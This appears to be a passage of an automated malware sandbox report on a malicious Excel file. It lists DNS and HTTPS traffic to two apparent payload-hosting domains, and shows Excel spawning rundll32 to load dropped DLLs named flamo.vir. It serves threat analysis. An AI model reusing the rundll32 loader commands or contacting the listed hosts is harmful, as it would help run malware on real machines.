                                                                                                                                                                                                                  Jun 29, 2021 17:47:14.309581995 CEST5299153192.168.2.48.8.8.8
                                                                                                                                                                                                                  Jun 29, 2021 17:47:14.366941929 CEST53529918.8.8.8192.168.2.4
                                                                                                                                                                                                                  Jun 29, 2021 17:47:15.324779034 CEST5299153192.168.2.48.8.8.8
                                                                                                                                                                                                                  Jun 29, 2021 17:47:15.381751060 CEST53529918.8.8.8192.168.2.4
                                                                                                                                                                                                                  Jun 29, 2021 17:47:15.674053907 CEST5370053192.168.2.48.8.8.8
                                                                                                                                                                                                                  Jun 29, 2021 17:47:15.723820925 CEST53537008.8.8.8192.168.2.4
                                                                                                                                                                                                                  Jun 29, 2021 17:47:16.690315008 CEST5172653192.168.2.48.8.8.8
                                                                                                                                                                                                                  Jun 29, 2021 17:47:16.874973059 CEST53517268.8.8.8192.168.2.4
                                                                                                                                                                                                                  Jun 29, 2021 17:47:16.939909935 CEST5679453192.168.2.48.8.8.8
                                                                                                                                                                                                                  Jun 29, 2021 17:47:16.989156008 CEST53567948.8.8.8192.168.2.4
                                                                                                                                                                                                                  Jun 29, 2021 17:47:17.291711092 CEST5299153192.168.2.48.8.8.8
                                                                                                                                                                                                                  Jun 29, 2021 17:47:17.347352982 CEST53529918.8.8.8192.168.2.4
                                                                                                                                                                                                                  Jun 29, 2021 17:47:18.234659910 CEST5653453192.168.2.48.8.8.8
                                                                                                                                                                                                                  Jun 29, 2021 17:47:18.292426109 CEST53565348.8.8.8192.168.2.4
                                                                                                                                                                                                                  Jun 29, 2021 17:47:18.780397892 CEST5662753192.168.2.48.8.8.8
                                                                                                                                                                                                                  Jun 29, 2021 17:47:18.840291977 CEST53566278.8.8.8192.168.2.4
                                                                                                                                                                                                                  Jun 29, 2021 17:47:20.327342033 CEST5662153192.168.2.48.8.8.8
                                                                                                                                                                                                                  Jun 29, 2021 17:47:20.376887083 CEST53566218.8.8.8192.168.2.4
                                                                                                                                                                                                                  Jun 29, 2021 17:47:21.321446896 CEST5299153192.168.2.48.8.8.8
                                                                                                                                                                                                                  Jun 29, 2021 17:47:21.368891001 CEST53529918.8.8.8192.168.2.4
                                                                                                                                                                                                                  Jun 29, 2021 17:47:21.376266003 CEST6311653192.168.2.48.8.8.8
                                                                                                                                                                                                                  Jun 29, 2021 17:47:21.422806978 CEST53631168.8.8.8192.168.2.4
                                                                                                                                                                                                                  Jun 29, 2021 17:47:22.648659945 CEST6407853192.168.2.48.8.8.8
                                                                                                                                                                                                                  Jun 29, 2021 17:47:22.695760965 CEST53640788.8.8.8192.168.2.4
                                                                                                                                                                                                                  Jun 29, 2021 17:47:24.035027027 CEST6480153192.168.2.48.8.8.8
                                                                                                                                                                                                                  Jun 29, 2021 17:47:24.082155943 CEST53648018.8.8.8192.168.2.4
                                                                                                                                                                                                                  Jun 29, 2021 17:47:25.153997898 CEST6172153192.168.2.48.8.8.8
                                                                                                                                                                                                                  Jun 29, 2021 17:47:25.201874971 CEST53617218.8.8.8192.168.2.4
                                                                                                                                                                                                                  Jun 29, 2021 17:47:26.007030964 CEST5125553192.168.2.48.8.8.8
                                                                                                                                                                                                                  Jun 29, 2021 17:47:26.053354025 CEST53512558.8.8.8192.168.2.4
                                                                                                                                                                                                                  Jun 29, 2021 17:47:27.706262112 CEST6152253192.168.2.48.8.8.8
                                                                                                                                                                                                                  Jun 29, 2021 17:47:27.761327028 CEST53615228.8.8.8192.168.2.4
                                                                                                                                                                                                                  Jun 29, 2021 17:47:28.807010889 CEST5233753192.168.2.48.8.8.8
                                                                                                                                                                                                                  Jun 29, 2021 17:47:28.856395960 CEST53523378.8.8.8192.168.2.4
                                                                                                                                                                                                                  Jun 29, 2021 17:47:30.379142046 CEST5504653192.168.2.48.8.8.8
                                                                                                                                                                                                                  Jun 29, 2021 17:47:30.427225113 CEST53550468.8.8.8192.168.2.4
                                                                                                                                                                                                                  Jun 29, 2021 17:47:30.754729986 CEST4961253192.168.2.48.8.8.8
                                                                                                                                                                                                                  Jun 29, 2021 17:47:30.828135967 CEST53496128.8.8.8192.168.2.4
                                                                                                                                                                                                                  Jun 29, 2021 17:47:31.738715887 CEST4928553192.168.2.48.8.8.8
                                                                                                                                                                                                                  Jun 29, 2021 17:47:31.796335936 CEST53492858.8.8.8192.168.2.4
                                                                                                                                                                                                                  Jun 29, 2021 17:47:46.564105988 CEST5060153192.168.2.48.8.8.8
                                                                                                                                                                                                                  Jun 29, 2021 17:47:46.703835964 CEST53506018.8.8.8192.168.2.4
                                                                                                                                                                                                                  Jun 29, 2021 17:47:47.277631044 CEST6087553192.168.2.48.8.8.8
                                                                                                                                                                                                                  Jun 29, 2021 17:47:47.336808920 CEST5644853192.168.2.48.8.8.8
                                                                                                                                                                                                                  Jun 29, 2021 17:47:47.336930990 CEST53608758.8.8.8192.168.2.4
                                                                                                                                                                                                                  Jun 29, 2021 17:47:47.399616957 CEST53564488.8.8.8192.168.2.4
                                                                                                                                                                                                                  Jun 29, 2021 17:47:47.916399002 CEST5917253192.168.2.48.8.8.8
                                                                                                                                                                                                                  Jun 29, 2021 17:47:47.974071980 CEST53591728.8.8.8192.168.2.4
                                                                                                                                                                                                                  Jun 29, 2021 17:47:48.461107969 CEST6242053192.168.2.48.8.8.8
                                                                                                                                                                                                                  Jun 29, 2021 17:47:48.517076015 CEST53624208.8.8.8192.168.2.4
                                                                                                                                                                                                                  Jun 29, 2021 17:47:49.200185061 CEST6057953192.168.2.48.8.8.8
                                                                                                                                                                                                                  Jun 29, 2021 17:47:49.254686117 CEST53605798.8.8.8192.168.2.4
                                                                                                                                                                                                                  Jun 29, 2021 17:47:50.200495958 CEST5018353192.168.2.48.8.8.8
                                                                                                                                                                                                                  Jun 29, 2021 17:47:50.334995031 CEST53501838.8.8.8192.168.2.4
                                                                                                                                                                                                                  Jun 29, 2021 17:47:50.806651115 CEST6153153192.168.2.48.8.8.8
                                                                                                                                                                                                                  Jun 29, 2021 17:47:50.863733053 CEST53615318.8.8.8192.168.2.4
                                                                                                                                                                                                                  Jun 29, 2021 17:47:52.137634039 CEST4922853192.168.2.48.8.8.8
                                                                                                                                                                                                                  Jun 29, 2021 17:47:52.195139885 CEST53492288.8.8.8192.168.2.4
                                                                                                                                                                                                                  Jun 29, 2021 17:47:53.036922932 CEST5979453192.168.2.48.8.8.8
                                                                                                                                                                                                                  Jun 29, 2021 17:47:53.091938019 CEST53597948.8.8.8192.168.2.4
                                                                                                                                                                                                                  Jun 29, 2021 17:47:53.562647104 CEST5591653192.168.2.48.8.8.8
                                                                                                                                                                                                                  Jun 29, 2021 17:47:53.620580912 CEST53559168.8.8.8192.168.2.4
                                                                                                                                                                                                                  Jun 29, 2021 17:47:53.920418024 CEST5275253192.168.2.48.8.8.8
                                                                                                                                                                                                                  Jun 29, 2021 17:47:53.978780031 CEST53527528.8.8.8192.168.2.4
                                                                                                                                                                                                                  Jun 29, 2021 17:47:54.111597061 CEST6054253192.168.2.48.8.8.8
                                                                                                                                                                                                                  Jun 29, 2021 17:47:54.166781902 CEST53605428.8.8.8192.168.2.4
                                                                                                                                                                                                                  Jun 29, 2021 17:48:06.916482925 CEST6068953192.168.2.48.8.8.8
                                                                                                                                                                                                                  Jun 29, 2021 17:48:06.980088949 CEST53606898.8.8.8192.168.2.4
                                                                                                                                                                                                                  Jun 29, 2021 17:48:07.127794027 CEST6420653192.168.2.48.8.8.8
                                                                                                                                                                                                                  Jun 29, 2021 17:48:07.192032099 CEST53642068.8.8.8192.168.2.4
                                                                                                                                                                                                                  Jun 29, 2021 17:48:09.685049057 CEST5090453192.168.2.48.8.8.8
                                                                                                                                                                                                                  Jun 29, 2021 17:48:09.743271112 CEST53509048.8.8.8192.168.2.4
                                                                                                                                                                                                                  Jun 29, 2021 17:48:41.242436886 CEST5752553192.168.2.48.8.8.8
                                                                                                                                                                                                                  Jun 29, 2021 17:48:41.307627916 CEST53575258.8.8.8192.168.2.4
                                                                                                                                                                                                                  Jun 29, 2021 17:48:42.787632942 CEST5381453192.168.2.48.8.8.8
                                                                                                                                                                                                                  Jun 29, 2021 17:48:42.853935957 CEST53538148.8.8.8192.168.2.4

                                                                                                                                                                                                                  DNS Queries

                                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                                                                  Jun 29, 2021 17:47:16.690315008 CEST192.168.2.48.8.8.80xe30fStandard query (0)psq.com.mxA (IP address)IN (0x0001)
                                                                                                                                                                                                                  Jun 29, 2021 17:47:18.234659910 CEST192.168.2.48.8.8.80x544fStandard query (0)academy.haleemcampus.comA (IP address)IN (0x0001)

                                                                                                                                                                                                                  DNS Answers

                                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                                                                  Jun 29, 2021 17:47:16.874973059 CEST8.8.8.8192.168.2.40xe30fNo error (0)psq.com.mx162.241.2.112A (IP address)IN (0x0001)
                                                                                                                                                                                                                  Jun 29, 2021 17:47:18.292426109 CEST8.8.8.8192.168.2.40x544fNo error (0)academy.haleemcampus.com108.179.232.80A (IP address)IN (0x0001)

                                                                                                                                                                                                                  HTTPS Packets

                                                                                                                                                                                                                  TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                                                                                                                                                  Jun 29, 2021 17:47:17.197526932 CEST162.241.2.112443192.168.2.449734CN=psq.com.mx CN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GBCN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GB CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=USTue Jul 28 02:00:00 CEST 2020 Fri Nov 02 01:00:00 CET 2018Thu Jul 29 01:59:59 CEST 2021 Wed Jan 01 00:59:59 CET 2031771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                                                                                                                  CN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GBCN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=USFri Nov 02 01:00:00 CET 2018Wed Jan 01 00:59:59 CET 2031
                                                                                                                                                                                                                  Jun 29, 2021 17:47:18.617918968 CEST108.179.232.80443192.168.2.449736CN=www.academy.haleemcampus.com CN=R3, O=Let's Encrypt, C=US CN=ISRG Root X1, O=Internet Security Research Group, C=USCN=R3, O=Let's Encrypt, C=US CN=ISRG Root X1, O=Internet Security Research Group, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Tue May 25 09:21:24 CEST 2021 Fri Sep 04 02:00:00 CEST 2020 Wed Jan 20 20:14:03 CET 2021Mon Aug 23 09:21:24 CEST 2021 Mon Sep 15 18:00:00 CEST 2025 Mon Sep 30 20:14:03 CEST 2024771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                                                                                                                  CN=R3, O=Let's Encrypt, C=USCN=ISRG Root X1, O=Internet Security Research Group, C=USFri Sep 04 02:00:00 CEST 2020Mon Sep 15 18:00:00 CEST 2025
                                                                                                                                                                                                                  CN=ISRG Root X1, O=Internet Security Research Group, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Jan 20 20:14:03 CET 2021Mon Sep 30 20:14:03 CEST 2024

                                                                                                                                                                                                                  Code Manipulations

                                                                                                                                                                                                                  Statistics

                                                                                                                                                                                                                  Behavior

                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                  System Behavior

                                                                                                                                                                                                                  Analysis Process: EXCEL.EXE PID: 6844 Parent PID: 800

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Start time:17:47:10
                                                                                                                                                                                                                  Start date:29/06/2021
                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                  Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
                                                                                                                                                                                                                  Imagebase:0xe40000
                                                                                                                                                                                                                  File size:27110184 bytes
                                                                                                                                                                                                                  MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                                                  Analysis Process: rundll32.exe PID: 5304 Parent PID: 6844

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Start time:17:49:08
                                                                                                                                                                                                                  Start date:29/06/2021
                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                  Commandline:rundll32 ..\flamo.vir,DllRegisterServer
                                                                                                                                                                                                                  Imagebase:0x20000
                                                                                                                                                                                                                  File size:61952 bytes
                                                                                                                                                                                                                  MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                                                  Analysis Process: rundll32.exe PID: 5428 Parent PID: 6844

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Start time:17:49:09
                                                                                                                                                                                                                  Start date:29/06/2021
                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                  Commandline:rundll32 ..\flamo.vir1,DllRegisterServer
                                                                                                                                                                                                                  Imagebase:0x20000
                                                                                                                                                                                                                  File size:61952 bytes
                                                                                                                                                                                                                  MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                                                  Disassembly

                                                                                                                                                                                                                  Code Analysis

                                                                                                                                                                                                                  Reset < >